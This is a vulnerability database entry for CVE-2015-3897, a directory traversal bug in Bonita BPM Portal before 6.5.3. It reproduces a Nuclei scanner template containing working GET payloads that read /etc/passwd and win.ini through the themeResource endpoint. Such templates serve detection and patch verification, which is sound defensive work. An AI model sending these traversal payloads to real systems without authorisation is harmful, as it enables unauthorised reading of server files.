Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-3897
HistoryApr 08, 2022 - 8:41 a.m.

Bonita BPM Portal <6.5.3 - Local File Inclusion

2022-04-0808:41:27
ProjectDiscovery
github.com
8

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.1 Medium

AI Score

Confidence

High

0.479 Medium

EPSS

Percentile

97.5%

Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a … (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.

id: CVE-2015-3897

info:
  name: Bonita BPM Portal <6.5.3 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
    - https://www.bonitasoft.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3897
    - https://www.htbridge.com/advisory/HTB23259
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-3897
    cwe-id: CWE-22
    epss-score: 0.74714
    epss-percentile: 0.98145
    cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bonitasoft
    product: bonita_bpm_portal
  tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd"
      - "{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: regex
        regex:
          - "root:[x*]:0:0:"
# digest: 490a00463044022006f2647ffb7ae5ad85523c66d30ff1d58ab95bd1625b4ffda762c5e8469a284d02204b701b13a6749a43c74cd44f8c83779fac26dff7f2aac6dc002e9b0879870667:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.1 Medium

AI Score

Confidence

High

0.479 Medium

EPSS

Percentile

97.5%